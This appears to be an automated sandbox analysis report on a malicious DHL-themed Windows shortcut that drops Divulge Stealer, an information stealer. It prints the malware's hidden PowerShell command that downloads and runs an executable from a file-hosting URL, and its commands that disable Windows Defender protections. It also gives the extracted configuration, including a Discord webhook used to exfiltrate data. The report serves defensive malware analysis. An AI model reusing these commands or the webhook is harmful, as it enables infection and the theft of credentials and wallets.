Windows Analysis Report
DHL AWB-documents.lnk

Overview

General Information

Sample name: DHL AWB-documents.lnk
Analysis ID: 1579624
MD5: 5e3249c32a70dc3b8d108c8bfe50c4d0
SHA1: 724787b337134448fd07cc626f9fa7edf978db3f
SHA256: b3be3371628c3633b544d0e73a2b0dfe93faef9f49cea25b7b88d7a9d9a1bccf
Tags: DHL, lnk, user-abuse_ch

Detection

Divulge Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Divulge Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • powershell.exe (PID: 6872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • setup_x86.exe (PID: 1220 cmdline: "C:\Users\user\Downloads\setup_x86.exe" MD5: E09F55D421CB45340A8C97C217BA56CF)
      • powershell.exe (PID: 3224 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2848 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 4024 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 3380 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 3552 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 4044 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2828 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 1404 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2084 cmdline: "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware configuration (Divulge Stealer): {"Webhook Url": "https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG", "Version": "v2.0", "Mutex": "sW7ROjkdVeQ0ALYye0hE"}

Source | Rule | Description | Author | Strings
C:\Users\user\Downloads\setup_x86.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000002.2836477844.000001F318682000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: setup_x86.exe PID: 1220 | JoeSecurity_DivulgeStealer | Yara detected Divulge Stealer | Joe Security |
Process Memory Space: setup_x86.exe PID: 1220 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

3.0.setup_x86.exe.1f316940000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\setup_x86.exe", ParentImage: C:\Users\user\Downloads\setup_x86.exe, ParentProcessId: 1220, ParentProcessName: setup_x86.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', ProcessId: 3224, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\setup_x86.exe", ParentImage: C:\Users\user\Downloads\setup_x86.exe, ParentProcessId: 1220, ParentProcessName: setup_x86.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 4024, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6872, TargetFilename: C:\Users\user\Downloads\setup_x86.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Downloads\setup_x86.exe", ParentImage: C:\Users\user\Downloads\setup_x86.exe, ParentProcessId: 1220, ParentProcessName: setup_x86.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe', ProcessId: 3224, ProcessName: powershell.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Downloads\setup_x86.exe, ProcessId: 1220, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\8mzJ3.scr
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://files.catbox.moe/l2rczc.pif -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }", ProcessId: 6872, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr; Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: C:\Users\user\Downloads\setup_x86.exe; Avira: detection malicious, Label: HEUR/AGEN.1307507
Source: 3.0.setup_x86.exe.1f316940000.0.unpack; Malware Configuration Extractor: Divulge Stealer {"Webhook Url": "https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG", "Version": "v2.0", "Mutex": "sW7ROjkdVeQ0ALYye0hE"}
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr; ReversingLabs: Detection: 87%
Source: C:\Users\user\Downloads\setup_x86.exe; ReversingLabs: Detection: 87%
Source: DHL AWB-documents.lnk; Virustotal: Detection: 46%
Source: DHL AWB-documents.lnk; ReversingLabs: Detection: 34%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr; Joe Sandbox ML: detected
Source: C:\Users\user\Downloads\setup_x86.exe; Joe Sandbox ML: detected
Source: DHL AWB-documents.lnk; Joe Sandbox ML: detected
Source: C:\Users\user\Downloads\setup_x86.exe; Code function: 3_2_00007FFD34A82B43 CryptUnprotectData,3_2_00007FFD34A82B43
Source: C:\Users\user\Downloads\setup_x86.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup_x86.exe.log
Source: unknown; HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unkno